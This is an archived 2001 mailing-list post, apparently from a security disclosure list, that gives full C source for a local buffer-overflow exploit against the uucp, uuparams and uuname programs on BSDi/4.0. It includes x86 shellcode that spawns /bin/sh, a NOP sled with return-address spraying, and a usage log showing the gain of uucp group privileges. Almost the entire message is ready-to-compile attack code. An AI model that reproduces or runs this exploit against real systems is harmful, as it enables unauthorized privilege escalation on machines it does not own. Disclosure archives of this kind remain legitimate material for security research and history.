(BSDi/4.0-specific)uucp family exploit. (uucp/uuparams/uuname)

From: Vade 79 (v9at_private)
Date: Sun Dec 02 2001 - 19:34:27 PST

Next message: Niels Provos: "SSH Vulnerability Scan"

Previous message: Shikap: "Buffer over flow on Outlook express for Macintosh"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) -- usage start -- bash-2.02$ id uid=123(t) gid=100(user) groups=100(user) bash-2.02$ cc bsdi_uucp.c -o bsdi_uucp bash-2.02$ ./bsdi_uucp -uuparams [ (BSDi/4.0)uucp*[]: family buffer overflow, by: v9at_private ] *** [data]: return address: 0x80474, program: /usr/sbin/uuparams. $ id uid=123(t) euid=6(uucp) gid=100(user) egid=6(uucp) groups=6(uucp), 100(user) $ -- usage end -- -- bsdi_uucp.c start -- /* (BSDi)uucp[] family buffer overflow. by: v9at_private this yields euid/egid/group=6(uucp) on BSDi/4.0 systems. (BSDi specific exploit) */ #define UUCP "/usr/bin/uucp" #define UUPARAMS "/usr/sbin/uuparams" #define UUNAME "/usr/bin/uuname" #define FILLER "x" static char exec[]= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46" "\xfa\x89\x46\x0c\x89\x76\x08\x50\x8d\x5e" "\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff" "\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62" "\x69\x6e\x2f\x73\x68\x00"; /* 46 chars. */ void usage(char *progname){ printf("*** [syntax]: %s <-uucp|-uuparams|" "-uuname>\n",progname); exit(1); } long pointer(void){__asm__("movl %esp,%eax");} int main(int ac,char **av){ unsigned short type=0; unsigned int i=0; long ret; char eip[1024],buf[4096]; char *progptr; printf("[ (BSDi/4.0)uucp*[]: family buffer o" "verflow, by: v9at_private ]\n"); if(ac>1){ if(!strncasecmp(av[1],"-uucp",5)){ progptr=UUCP; type=1; } else if(!strncasecmp(av[1],"-uuparams",9)){ progptr=UUPARAMS; type=0; } else if(!strncasecmp(av[1],"-uuname",7)){ progptr=UUNAME; type=0; } else usage(av[0]); } else usage(av[0]); ret=(pointer()+sizeof(buf)); eip[0]=0x01;eip[1]=0x01;eip[2]=0x01; for(i=3;i<1024;i+=4){*(long *)&eip[i]=ret;} eip[i]=0x0;for(i=0;i<(sizeof(buf)- strlen(exec)-strlen(eip));i++){*(buf+i)=0x90;} memcpy(buf+i,exec,strlen(exec)); memcpy(buf,"EXEC=",5);putenv(buf); printf("*** [data]: return address: 0x%lx, p" "rogram: %s.\n",ret,progptr); if(execl(progptr,progptr,FILLER, (type?FILLER:eip),(type?eip:0),0)){ printf("*** [error]: could not execute %s s" "uccessfully.\n",progptr); exit(1); } exit(0); } -- bsdi_uucp.c end -- Vade79 -> v9at_private -> fakehalo.deadpig.org

Next message: Niels Provos: "SSH Vulnerability Scan"
Previous message: Shikap: "Buffer over flow on Outlook express for Macintosh"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Dec 03 2001 - 14:44:45 PST